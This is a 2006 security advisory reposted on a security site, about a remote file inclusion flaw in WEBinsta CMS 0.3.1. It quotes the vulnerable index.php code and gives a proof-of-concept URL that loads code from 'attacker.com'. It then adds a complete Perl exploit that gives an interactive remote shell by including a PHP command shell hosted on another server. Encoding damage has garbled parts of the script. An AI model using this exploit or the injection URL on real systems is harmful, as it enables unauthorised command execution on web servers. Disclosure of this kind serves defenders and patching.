WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability

Advisory Content :

ECHO_ADV_45$2006

------------------------------------------------------------------------
-----------------

[ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion
Vulnerability

------------------------------------------------------------------------
-----------------

Author : M.Hasran Addahroni

Date : Aug, 12th 2006

Location : Australia, Sydney

Web : http://advisories.echo.or.id/adv/adv45-K-159-2006.txt

Critical Lvl : Dangerous

------------------------------------------------------------------------
---

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : WEBinsta CMS

version : 0.3.1

URL : http://www.webinsta.com/

https://sourceforge.net/projects/webinsta/

http://atomo64.puffinhost.com/page/webinsta_cms.html

Description :

WEBinsta CMS provides a dynamic website building solution for small
buisness and

indivisuals who want to make their web presence felt. It provides a
powerful

system for people who doesn't know nothing about html or PHP.

Webinsta CMS is not longer supported by the Webinsta Team, now atomo64

the only active developer and he's going to continue with it's
development.

The new CMS name is InWeb CMS

------------------------------------------------------------------------
---

Proof of Concept:

~~~~~~~~~~~~~~~

Vulnerable Script: index.php .

---------------index.php--------------------------------

...

$tp_main=new bTemplate();

$tp_temp=new bTemplate();

include("code/processmods.php");

/*Read the block definition and the number*/

include($templates_dir."template.def.php");

/*administration panel and editing settings */

$show_edit=false;

...

------------------------------------------------------------------

Variables $templates_dir are not properly sanitized.

When register_globals=on and allow_fopenurl=on an attacker can

exploit this vulnerability with a simple php injection script.

Poc/Exploit:

~~~~~~~~~~~

http://www.target.com/[webinstacms_path]/index.php?templates_dir=http://
attacker.com/evil?

Solution:

~~~~~~~~

use the latest version

Notification:

~~~~~~~~~~~

vendor not contact yet

------------------------------------------------------------------------
---

Shoutz:

~~~~~~

~ ping - my dearest wife, for all the luv the tears n the breath

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative,kaiten

~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,bayl
aw

~ SinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit,
x16

~ newbie_hacker (at) yahoogroups (dot) com [email concealed]

~ #aikmel #e-c-h-o @irc.dal.net

------------------------------------------------------------------------
---

Contact:

~~~~~~~

K-159 || echo|staff || eufrato[at]gmail[dot]com

Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ]
----------------------------------

Perl Exploit:

~~~~~~~~~~~

#!/usr/bin/perl

##

# WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Exploit

# Bug Found & code By K-159

##

# echo.or.id (c) 2006

#

##

# usage:

# perl WEBinsta.pl <target> <cmd shell location> <cmd shell variable>

#

# perl WEBinsta.pl http://target.com/ http://site.com/cmd.txt cmd

#

# cmd shell example: <?passthru($_GET[cmd]);?>

#

# cmd shell variable: ($_GET[cmd]);

##

# #

#Greetz: My Dearest Wife - ping,

#echo|staff
(y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative),

#SinChan, sakitjiwa, maSter-oP, mr_ny3m, bithedz, lieur-euy, x16,
mbahngarso, etc

#

# Contact: www.echo.or.id #e-c-h-o @irc.dal.net

##

use LWP::UserAgent;

$Path = $ARGV[0];

$Pathtocmd = $ARGV[1];

$cmdv = $ARGV[2];

if($Path!~/http:/// || $Pathtocmd!~/http:/// || !$cmdv){usage()}

head();

while()

{

print "[shell] $";

while(<STDIN>)

{

$cmd=$_;

chomp($cmd);

$xpl = LWP::UserAgent->new() or die;

$req = HTTP::Request->new(GET
=>$Path.'index.php?templates_dir='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die
"nCould Not connectn";

$res = $xpl->request($req);

$return = $res->content;

$return =~ tr/[n]/[�ƒ.�‚ª]/;

if (!$cmd) {print "nPlease Enter a Commandnn"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return
=~/: Cannot execute a blank command in <b>/)

{print "nCould Not Connect to cmd Host or Invalid Command Variablen";exit}

elsif ($return =~/^<br./>.<b>Fatal.error/) {print "nInvalid Command or No
Returnnn"}

if($return =~ /(.*)/)

{

$finreturn = $1;

$finreturn=~ tr/[�ƒ.�‚ª]/[n]/;

print "rn$finreturnnr";

last;

}

else {print "[shell] $";}}}last;

sub head()

{

print
"n=====================================================================
=======rn";

print " *WEBinsta CMS 0.3.1 templates_dir Remote File Inclusion
Exploit*rn";

print
"=======================================================================
=====rn";

}

sub usage()

{

head();

print " Usage: perl WEBinsta.pl <target> <cmd shell location> <cmd shell
variable>rnn";

print " <Site> - Full path to WEBinsta CMS ex: http://www.site.com/ rn";

print " <cmd shell> - Path to cmd Shell e.g
http://www.different-site.com/cmd.txt rn";

print " <cmd variable> - Command variable used in php shell rn";

print
"=======================================================================
=====rn";

print " Bug Found by K-159 rn";

print " www.echo.or.id #e-c-h-o irc.dal.net 2006 rn";

print
"=======================================================================
=====rn";

exit();

}

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability